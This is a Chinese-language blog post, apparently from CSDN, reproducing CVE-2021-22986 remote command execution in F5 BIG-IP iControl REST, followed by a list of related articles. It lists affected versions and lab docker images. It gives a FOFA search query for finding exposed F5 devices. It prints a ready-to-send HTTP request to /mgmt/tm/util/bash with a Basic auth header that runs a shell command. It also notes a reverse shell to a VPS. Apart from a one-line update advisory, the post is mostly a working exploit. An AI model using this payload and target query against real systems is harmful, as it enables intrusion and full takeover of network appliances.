F5 BIG-IP iControl REST未授权命令注入RCE(CVE-2021-22986)

最新推荐文章于 2023-11-08 09:42:52 发布
最新推荐文章于 2023-11-08 09:42:52 发布
阅读量935 收藏
点赞数 1
文章标签: tcp/ip 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xiaobai_20190815/article/details/124815505
版权

一、漏洞描述

F5 BIG-IP 链路控制器用于最大限度提升链路性能与可用性的下一代广域网链路流量管理。F5 BIG-IP 存在代码执行漏洞,该漏洞允许定义身份验证的攻击者通过 BIG-IP 管理界面和自身IP地址对 iControl REST 接口进行网络访问,以执行任意系统命令,控制目标机器。

二、影响版本

F5 BIG-IQ 6.0.0-6.1.0

F5 BIG-IQ 7.0.0-7.0.0.1

F5 BIG-IQ 7.1.0-7.1.0.2

F5 BIG-IP 12.1.0-12.1.5.2

F5 BIG-IP 13.1.0-13.1.3.5

F5 BIG-IP 14.1.0-14.1.3.1

F5 BIG-IP 15.1.0-15.1.2

F5 BIG-IP 16.0.0-16.0.1

三、漏洞环境

1、docker pull yhbl/cve-2021-22986 / docker pull f5devcentral/f5-bigip-image-generator (需要配置,详情请搜索dockerhub)

2、fofa: body="F5 Networks, Inc"

四、漏洞复现

payload:

POST /mgmt/tm/util/bash HTTP/1.1
Host: {{Hostname}}
Accept-Language: en
X-F5-Auth-Token:
Content-Type: application/json
Authorization: Basic YWRtaW46QVNhc1M=
Connection: close

{"command":"run","utilCmdArgs":"-c id"}

五、漏洞利用

1、尝试反弹到vps上,反弹成功

六、更新建议

建议更新到最新版本

whatever`
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
icontrol-rest-api-user-guide-13-0-0_15
08-29
icontrol-rest-api-user-guide-13-0-0_15, F5, API, 自动化
F5 BIG-IP iControl RCE (CVE-2021-22986)
MD@@nr丫卡uer
03-19 2474
漏洞描述 F5 BIG-IP 是美国 F5 公司的一款集成了网络流量管理、应用程序安全管理、负载均衡等功能的应用交付平台。 1、CVE-2021-22986 BIG-IP/BIG-IQ iControl REST 授权远程代码执行漏洞 中,经身份验证的攻击者可通过iControl REST接口,构造恶意请求,执行任意系统命令。 2、CVE-2021-22987 BIG-IP TMUI 后台远程代码执行漏洞 中,经过身份验证的用户可构造恶意请求,执行任意系统命令。 3、CVE-2021-22988 BIG
icontrol-rest-api-user-guide-13-0-0.pdf
04-25
icontrol-rest-api-user-guide-13-0-0.pdf
F5紧急修复严重的 BIG-IP 预认证 RCE 漏洞
smellycat000的专栏
03-11 788
聚焦源代码安全,网罗国内外最新资讯!编译:奇安信代码卫士团队全球顶级企业网络设备巨头 F5 Networks 发现影响多数 BIG-IPBIG-IP软件版本的四个严重的远程代码执行...
F5 BIG-IP代码执行漏洞(CVE-2021-22986
m0_48520508的博客
04-01 2063
0x00简介 F5 BIG-IP 是美国``F5公司一款集成流量管理、DNS、出入站规则、web应用防火墙、web网关、负载均衡等功能的应用交付平台。 0x01漏洞概述 F5 BIG-IP/BIG-IQ iControl REST 授权远程代码执行漏洞中,经身份验证的攻击者可通过iControl REST接口,构造恶意请求,执行任意系统命令。 0x02影响版本 F5 BIG-IP 16.0.0-16.0.1 F5 BIG-IP 15.1.0-15.1.2 F5 BIG-IP 14.1.0-14.1.3
CVE-2021-22986:CVE-2021-22986F5 BIG-IP RCE
03-25
此漏洞允许经身份验证的攻击者通过BIG-IP管理界面和自身IP地址对iControl REST接口进行网络访问,以执行任意系统命令,创建或删除文件以及禁用服务。 此漏洞只能通过控制平面利用,而不能通过数据平面利用。 剥削...
BIG-IP(BIG-IQ)授权RCE(CVE-2021-22986)1
08-08
BIG-IP(BIG-IQ)授权RCE(CVE-2021-22986)1
CVE-2021-22192:CVE-2021-22192靶场:授权用户RCE漏洞
03-30
CVE-2021-22192 CVE-2021-22192靶场:授权用户RCE漏洞0x10靶场环境0x20目录结构CVE-2021-22192├── README.md ............... [此 README 说明]├── imgs .................... [辅助 README 说明的图片]├─...
F5 BIG-IP RCE exploitation (CVE-2022-1388).md
07-09
F5 BIG-IP RCE exploitation (CVE-2022-1388)
CVE-2021-2109:通过JNDI的CVE-2021-2109 && Weblogic Server RCE
05-26
CVSS向量:(CVSS:3.1 / AV:N / AC:L / PR:H / UI:N / S:U / C:H / I:H / A:H) 使适应 需要登录验证 如何RCE 步骤1:设定Weblogic 步骤2:登入 步骤3:设定JNDI伺服器 java -cp marshals
f5-api:RESTful访问F5 iControlRest API和BigIQAS3 API
03-04
f5-api 该API提供对F5 BigIP / LTM的宁静API访问 终点 GET /v1/f5/ping GET /v1/f5/version GET /v1/f5/metrics GET /v1/f5/{host}/clientssl GET /v1/f5/{host}/clientssl/{clientsslprofilename} PUT /v1/f5/{host}/createclientssl/{clientsslprofilename} PUT /v1/f5/{host}/uploadclientssl/{updatesslprofilename} 用法 带有LTM主机列表的配置文件 CRUD操作: SSL客户端证书 SSL密钥 SSL客户端配置文件 启用一台或多台LTM主机上的操作 列出客户端SSL配置文件 得到 /v1/f5/flt-ltm-cluster.exa
F5 BIG-IP iControl REST命令执行(CVE-2022-1388)
不忘初心,护天下安全!
06-27 891
2022年5月6日,F5官网发布安全公告,披露F5 BIG-IP存在一处远程代码执行漏洞(CVE-2022-1388)。漏洞存在于iControl REST组件中,该漏洞允许定义身份验证的攻击者通过 BIG-IP 管理界面和自身IP地址对 iControl REST API 接口进行网络访问,进而导致可以在目标主机上执行任意系统命令、创建或删除文件或禁用BIG-IP上的服务。组件:F5 BIG-IP iControl REST漏洞类型:身份验证绕过影响:命令执行简述:该漏洞允许经身份验证的攻击者通过管理口
F5 BIG-IP远程代码执行漏洞(CVE-2021-22986)
thelostworld
03-20 3564
F5 BIG-IP远程代码执行漏洞(CVE-2021-22986) 一、简介 该漏洞允许经身份验证的攻击者通过BIG-IP管理界面和自身IP地址对iControl REST接口进行网络访问,以执行任意系统命令,创建或删除文件以及禁用服务。 ​ 二、影响版本 F5 BIG-IP 16.x: 16.1.0.3 F5 BIG-IP 15.x: 15.1.0.4 F5 BIG-IP 14.x: 14.1.2.6 F5 BIG-IP 13.x: 13.1.3.4 F5 BIG-IP 12.x:..
CVE-2022-1388 F5 BIG-IP iControl REST 处理进程分析与认证绕过漏洞复现
weixin_50464560的博客
05-10 1994
转载至CVE-2022-1388 F5 BIG-IP iControl REST 处理进程分析与认证绕过漏洞复现-网盾安全学院 (315safe.com) 漏洞信息 F5 BIG-IP是美国F5公司的一款集成了网络流量管理、应用程序安全管理、负载均衡等功能的应用交付平台。2022年5月4日,F5官方发布安全通告,修复了一个存在于BIG-IP iControl REST中的身份验证绕过漏洞。漏洞编号:CVE-2022-1388,影响版本如下: 环境搭建 下载v15.x系列: 首次运行需要修改
F5 Networks Endpoint Inspector可以通过特殊构造的页面触发RCE
systemino的博客
07-03 588
F5端点检查器(F5 Networks Endpoint Inspector)是一个安全检查应用程序,它可以被web浏览器调用,来扫描客户端的运行是否符合安全要求。 近期有研究人员发现,如果F5端点检查器可能会被恶意网站滥用,通过特殊构造的页面触发RCE。 具体利用过程,请看此视频。 下面我们来详细说明一下这个过程: 1.可以看到,如果浏览http://naughty.website/网站...
F5 多款产品中存在多个RCE漏洞
smellycat000的专栏
11-17 410
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士安全公司Rapid7表示,F5产品受多个漏洞和其它安全问题影响。Rapid7公司在8月中旬将研究成果告知F5,并在F5发布安全公告通知用户并推出工程热补丁之时,发布了相关漏洞详情。研究人员指出,其中两个漏洞是高危漏洞并已获得CVE编号(CVE-2022-41622和CVE-2022-41800),而F5认为其余的安全绕过方法并非漏洞。最严重的漏洞...
F5 BIG-IP RCE漏洞(CVE-2023-46747)来看请求走私的利用价值
最新发布
C20220511的博客
11-08 960
关于绕过权限之后F5 BIG-IP执行命令的逻辑在F5历史漏洞CVE-2022-1388中已经使用过,其实F5 BIG-IP本身就提供了接口/mgmt/tm/util/bash为后台用户执行系统命令的,有兴趣的读者也可以看https://mp.weixin.qq.com/s/wUoBy7ZiqJL2CUOMC-8Wdg了解详细的创建用户和后台命令执行的逻辑。从图2.3可以看出,整个AJP请求走私的流程是可以把一个HTTP请求经过AJP代理转化之后转化为两个AJP请求,这也是请求走私名字的来源。
F5 BIGIP CVE-2021-22986认证绕过漏洞分析
include_voidmain的博客
06-15 2175
F5 BIGIP CVE-2021-22986认证绕过漏洞分析
F5 BIG-IP 远程代码执行漏洞 CVE-2021-22986
sun_k的博客
03-25 831
免责声明:本站提供安全工具、程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负! 转载声明:著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。 一:漏洞描述 F5 BIG-IP 是美国 F5 公司的一款集成了网络流量管理、应用程序安全管理、负载均衡等功能的应用交付平台,,F5安全公告更新了BIG-IPBIG-IQ中的多个严重漏洞。 二: 漏洞影响 F5 BIG-IP 16.x: 16.1.0.3 F5 BIG-IP 15.x: 15.1.0.4 F5 BIG-IP 14.x:
CVE-2017-15715漏洞和SSI-RCE漏洞。
07-27
CVE-2017-15715是一个存在于Apache Tomcat软件中的漏洞,该漏洞使得攻击者可以通过发送特制的HTTP请求,触发目标服务器上的远程代码执行。这个漏洞的影响范围是Tomcat 9.0.0.M1到9.0.0.M28版本(不包括9.0.0.M9版本)。如果目标服务器受到此漏洞的影响,攻击者可以利用它执行任意代码,可能导致敏感信息泄露或服务器完全被控制。 SSI-RCE漏洞是一种服务器端包含(SSI)漏洞,可能导致远程命令执行。SSI是一种服务器端处理动态内容的技术,它允许将外部文件包含到网页中。如果服务器正确配置和过滤用户提供的输入,攻击者可以通过注入恶意代码来执行任意命令。这种漏洞可能会导致服务器被完全控制,从而造成数据泄露、服务拒绝或其他恶意行为。 请注意,对于具体的漏洞信息和修复建议,请查阅相应漏洞的CVE编号或相关安全公告以获取更准确和详细的信息。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值